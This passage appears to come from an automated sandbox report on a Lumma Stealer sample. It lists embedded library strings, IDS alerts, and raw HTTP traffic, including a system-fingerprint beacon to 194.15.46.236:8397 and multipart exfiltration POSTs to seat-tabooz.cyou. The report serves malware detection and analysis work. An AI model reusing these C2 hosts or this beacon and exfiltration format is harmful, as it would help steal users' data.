Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography.X509Certificates\Release\net7.0\System.Security.Cryptography.X509Certificates.pdbSHA256B source: mDHwap5GlV.exe, 00000000.00000002.2593821344.000000000CA20000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdbSHA256(s source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net7.0\System.Net.ServicePoint.pdb source: mDHwap5GlV.exe, 00000000.00000002.2610251919.000000000E1E0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Primitives\Release\net7.0-windows\System.Net.Primitives.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2583501518.0000000009B20000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2583583075.0000000009B61000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net7.0\System.Linq.pdb source: mDHwap5GlV.exe, 00000000.00000002.2587665887.000000000A930000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2587777590.000000000A9B1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Registry\Release\net7.0-windows\Microsoft.Win32.Registry.pdb source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Buffers\Release\net7.0\System.Buffers.pdbSHA256 source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq.Expressions\Release\net7.0\System.Linq.Expressions.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2586676294.000000000A3E1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2586356950.000000000A070000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: /_/artifacts/obj/System.Management/Release/net7.0-windows/System.Management.pdbSHA256A) source: mDHwap5GlV.exe, 00000000.00000002.2609096644.000000000DEF0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Console.ni.pdb source: mDHwap5GlV.exe, mDHwap5GlV.exe, 00000000.00000002.2585865823.0000000009D10000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2583359508.0000000009AD1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Debug\Release\net7.0\System.Diagnostics.Debug.pdb source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: /_/artifacts/obj/System.CodeDom/Release/net7.0/System.CodeDom.pdbSHA256 ] source: mDHwap5GlV.exe, 00000000.00000002.2609096644.000000000DEF0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Net.Http.ni.pdb source: mDHwap5GlV.exe, mDHwap5GlV.exe, 00000000.00000002.2586133206.0000000009EE1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2585894979.0000000009D40000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net7.0\Microsoft.Win32.Primitives.pdb source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net7.0\System.Threading.ThreadPool.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2607545242.000000000DD80000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2595889586.000000000D010000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net7.0-windows\System.Net.Http.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2586133206.0000000009EE1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2585894979.0000000009D40000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net7.0\System.Text.Encoding.Extensions.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2608346084.000000000DE60000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net7.0\System.Threading.Thread.pdb source: mDHwap5GlV.exe, 00000000.00000002.2607545242.000000000DD80000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2609058208.000000000DEE0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2595889586.000000000D010000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net7.0-windows\System.Net.Http.pdb source: mDHwap5GlV.exe, mDHwap5GlV.exe, 00000000.00000002.2586133206.0000000009EE1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2585894979.0000000009D40000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Net.Primitives.ni.pdb source: mDHwap5GlV.exe, mDHwap5GlV.exe, 00000000.00000002.2583501518.0000000009B20000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2583583075.0000000009B61000.00000020.00000001.00040000.00000003.sdmp

Networking

Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49924 -> 172.67.178.191:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49924 -> 172.67.178.191:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49956 -> 172.67.178.191:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49962 -> 172.67.178.191:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49930 -> 172.67.178.191:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49930 -> 172.67.178.191:443
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 8397
Source: unknown Network traffic detected: HTTP traffic on port 8397 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 8397
Source: unknown Network traffic detected: HTTP traffic on port 8397 -> 49805
Source: global traffic TCP traffic: 192.168.2.4:49733 -> 194.15.46.236:8397
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic HTTP traffic detected: GET /8.46.123.75/json HTTP/1.1Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic HTTP traffic detected: GET /software/AI-Setup HTTP/1.1Host: 194.15.46.236:8397
Source: global traffic HTTP traffic detected: POST /notify-launch HTTP/1.1Host: 194.15.46.236:8397Content-Type: application/json; charset=utf-8Content-Length: 268Data Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 37 35 22 2c 22 75 73 65 72 4e 61 6d 65 22 3a 22 6a 6f 6e 65 73 22 2c 22 73 79 73 74 65 6d 22 3a 22 57 69 6e 33 32 4e 54 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 2e 31 39 30 34 35 2e 30 22 2c 22 6c 61 75 6e 63 68 43 6f 64 65 22 3a 22 41 49 2d 53 65 74 75 70 22 2c 22 73 6f 66 74 77 61 72 65 53 74 61 74 75 73 22 3a 22 54 72 75 65 22 2c 22 70 72 6f 63 65 73 73 6f 72 22 3a 22 49 6e 74 65 6c 36 34 20 46 61 6d 69 6c 79 20 36 20 4d 6f 64 65 6c 20 31 34 33 20 53 74 65 70 70 69 6e 67 20 38 2c 20 47 65 6e 75 69 6e 65 49 6e 74 65 6c 22 2c 22 67 70 75 22 3a 22 53 41 4b 32 50 58 22 2c 22 61 6e 74 69 76 69 72 75 73 22 3a 22 55 6e 6b 6e 6f 77 6e 20 41 6e 74 69 76 69 72 75 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 53 22 7d Data Ascii: {"ip":"8.46.123.75","userName":"user","system":"Win32NT Microsoft Windows NT 10.0.19045.0","launchCode":"AI-Setup","softwareStatus":"True","processor":"Intel64 Family 6 Model 143 Stepping 8, GenuineIntel","gpu":"SAK2PX","antivirus":"Unknown Antivirus","country":"US"}
Source: Joe Sandbox View IP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox View IP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: ipinfo.io
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49733 -> 194.15.46.236:8397
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49924 -> 172.67.178.191:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49930 -> 172.67.178.191:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49937 -> 172.67.178.191:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49943 -> 172.67.178.191:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49956 -> 172.67.178.191:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49972 -> 172.67.178.191:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49962 -> 172.67.178.191:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49949 -> 172.67.178.191:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49738 -> 172.67.74.152:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49740 -> 34.117.59.81:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49799 -> 172.67.74.152:443
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: seat-tabooz.cyou
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: seat-tabooz.cyou
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=N9VBPBASCUN4LT6T4PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: seat-tabooz.cyou
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=D66BD5XYE6FE15S1U9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: seat-tabooz.cyou
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=O3FE5JO3EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20378Host: seat-tabooz.cyou
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ZJLGCJ447ZQYPXPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1207Host: seat-tabooz.cyou
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ROW280E3GQ9EGOVW1HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 584767Host: seat-tabooz.cyou
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: global traffic DNS traffic detected: DNS query: api.ipify.org
Source: global traffic DNS traffic detected: DNS query: ipinfo.io
Source: global traffic DNS traffic detected: DNS query: seat-tabooz.cyou
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: seat-tabooz.cyou
Source: mDHwap5GlV.exe String found in binary or memory: http://.css
Source: mDHwap5GlV.exe String found in binary or memory: http://.jpg
Source: mDHwap5GlV.exe String found in binary or memory: http://194.15.46.236:8397
Source: mDHwap5GlV.exe, 00000000.00000002.2568628976.00000000052FE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://194.15.46.236:8397/
Source: mDHwap5GlV.exe, 00000000.00000002.2568628976.00000000052FE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://194.15.46.236:8397/notify-launchH
Source: mDHwap5GlV.exe, 00000000.00000002.2568628976.0000000005171000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://194.15.46.236:8397/software/AI-Setup
Source: mDHwap5GlV.exe, 00000000.00000002.2568628976.00000000051BD000.00000004.00001000.00020000.00000000.sdmp, mDHwap5GlV.exe, 00000000.00000002.2568628976.00000000052EE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://api.ipify.org:443/
Source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp, decrypted_app_1.exe.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
Source: pipanel.exe, 00000008.00000003.3199592072.0000000005366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: pipanel.exe, 00000008.00000003.3199592072.0000000005366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: decrypted_app_1.exe.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp, decrypted_app_1.exe.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp, decrypted_app_1.exe.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
Source: pipanel.exe, 00000008.00000003.3199592072.0000000005366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp, decrypted_app_1.exe.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
Source: pipanel.exe, 00000008.00000003.3199592072.0000000005366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: pipanel.exe, 00000008.00000003.3199592072.0000000005366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: decrypted_app_1.exe.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp, decrypted_app_1.exe.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: decrypted_app_1.exe.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
Source: pipanel.exe, 00000008.00000003.3199592072.0000000005366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: decrypted_app_1.exe.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
Source: pipanel.exe, 00000008.00000003.3199592072.0000000005366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: mDHwap5GlV.exe String found in binary or memory: http://html4/loose.dtd
Source: mDHwap5GlV.exe, 00000000.00000002.2568628976.00000000052CA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ipinfo.io:443/
Source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp String found in binary or memory: http://james.newtonking.com/projects/json
Source: pipanel.exe, 00000008.00000003.3199592072.0000000005366000.00000004.00000800.00020000.00000000.sdmp, decrypted_app_1.exe.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp, decrypted_app_1.exe.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp, decrypted_app_1.exe.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp String found in binary or memory: http://ocsp.digicert.com0O
Source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp, decrypted_app_1.exe.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: pipanel.exe, 00000008.00000003.3199592072.0000000005366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: powershell.exe, 00000004.00000002.1921706741.0000000004984000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp, decrypted_app_1.exe.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: decrypted_app_1.exe, 00000007.00000000.2526968446.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, decrypted_app_1.exe.0.dr String found in binary or memory: http://www.faststone.org/
Source: decrypted_app_1.exe, 00000007.00000000.2526968446.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, decrypted_app_1.exe.0.dr String found in binary or memory: http://www.faststone.org/FSCTutorial.htm
Source: decrypted_app_1.exe, 00000007.00000000.2526968446.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, decrypted_app_1.exe.0.dr String found in binary or memory: http://www.faststone.org/FSCTutorial.htmU
Source: decrypted_app_1.exe, 00000007.00000000.2526968446.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, decrypted_app_1.exe.0.dr String found in binary or memory: http://www.faststone.org/U
Source: pipanel.exe, 00000008.00000003.3199592072.0000000005366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: pipanel.exe, 00000008.00000003.3199592072.0000000005366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: pipanel.exe, 00000008.00000003.3149914594.000000000536F000.00000004.00000800.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3150677116.0000000005358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: mDHwap5GlV.exe, 00000000.00000002.2579250660.0000000008DC1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2577048094.0000000008330000.00000002.00000001.00040000.00000003.sdmp String found in binary or memory: https://aka.ms/GlobalizationInvariantMode
Source: mDHwap5GlV.exe, 00000000.00000002.2577048094.00000000088EA000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2579250660.0000000009371000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2579250660.0000000008DC1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2577048094.0000000008330000.00000002.00000001.00040000.00000003.sdmp String found in binary or memory: https://aka.ms/binaryformatter
Source: mDHwap5GlV.exe String found in binary or memory: https://aka.ms/dotnet-core-applaunch?
Source: mDHwap5GlV.exe String found in binary or memory: https://aka.ms/dotnet-core-applaunch?Description:
Source: mDHwap5GlV.exe, 00000000.00000002.2577048094.00000000088EA000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2579250660.0000000009371000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2579250660.0000000008DC1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2577048094.0000000008330000.00000002.00000001.00040000.00000003.sdmp String found in binary or memory: https://aka.ms/dotnet-illink/com
Source: mDHwap5GlV.exe, 00000000.00000002.2577048094.00000000088EA000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2579250660.0000000009371000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2579250660.0000000008DC1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2577048094.0000000008330000.00000002.00000001.00040000.00000003.sdmp String found in binary or memory: https://aka.ms/dotnet-illink/nativehost
Source: mDHwap5GlV.exe, 00000000.00000002.2593821344.000000000CA20000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2604580772.000000000D410000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2593507496.000000000C900000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2604677499.000000000D431000.00000020.00000001.00040000.00000003.sdmp String found in binary or memory: https://aka.ms/dotnet-warnings/
Source: mDHwap5GlV.exe String found in binary or memory: https://aka.ms/dotnet/app-launch-failed
Source: mDHwap5GlV.exe String found in binary or memory: https://aka.ms/dotnet/download
Source: mDHwap5GlV.exe String found in binary or memory: https://aka.ms/dotnet/downloadInstall
Source: mDHwap5GlV.exe String found in binary or memory: https://aka.ms/dotnet/info
Source: mDHwap5GlV.exe String found in binary or memory: https://aka.ms/dotnet/sdk-not-foundFailed
Source: mDHwap5GlV.exe, 00000000.00000002.2577048094.0000000008330000.00000002.00000001.00040000.00000003.sdmp String found in binary or memory: https://aka.ms/nativeaot-compatibility
Source: powershell.exe, 00000004.00000002.1921706741.0000000004958000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1921706741.0000000004967000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lBdq
Source: mDHwap5GlV.exe, 00000000.00000002.2568628976.00000000051BD000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org
Source: mDHwap5GlV.exe String found in binary or memory: https://api.ipify.org;Error
Source: pipanel.exe, 00000008.00000003.3201020059.0000000005341000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: pipanel.exe, 00000008.00000003.3149914594.000000000536F000.00000004.00000800.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3150677116.0000000005358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: pipanel.exe, 00000008.00000003.3149914594.000000000536F000.00000004.00000800.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3150677116.0000000005358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: pipanel.exe, 00000008.00000003.3149914594.000000000536F000.00000004.00000800.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3150677116.0000000005358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: pipanel.exe, 00000008.00000003.3201020059.0000000005341000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: pipanel.exe, 00000008.00000003.3149914594.000000000536F000.00000004.00000800.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3150677116.0000000005358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: pipanel.exe, 00000008.00000003.3149914594.000000000536F000.00000004.00000800.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3150677116.0000000005358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: pipanel.exe, 00000008.00000003.3149914594.000000000536F000.00000004.00000800.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3150677116.0000000005358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp String found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
Source: mDHwap5GlV.exe, 00000000.00000002.2586676294.000000000A3E1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2586356950.000000000A070000.00000002.00000001.00040000.00000003.sdmp String found in binary or memory: https://github.com/dotnet/linker/issues/2392
Source: mDHwap5GlV.exe String found in binary or memory: https://github.com/dotnet/runtime
Source: mDHwap5GlV.exe, 00000000.00000002.2579250660.0000000008DC1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2577048094.0000000008330000.00000002.00000001.00040000.00000003.sdmp String found in binary or memory: https://github.com/dotnet/runtime/blob/bbc898f3e5678135b242faeb6eefd8b24bf04f3c/src/native/corehost/
Source: mDHwap5GlV.exe, 00000000.00000002.2579250660.0000000008DC1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2577048094.0000000008330000.00000002.00000001.00040000.00000003.sdmp String found in binary or memory: https://github.com/dotnet/runtime/issues/71847
Source: mDHwap5GlV.exe String found in binary or memory: https://github.com/mono/linker/issues/1416.
Source: mDHwap5GlV.exe String found in binary or memory: https://github.com/mono/linker/issues/1731
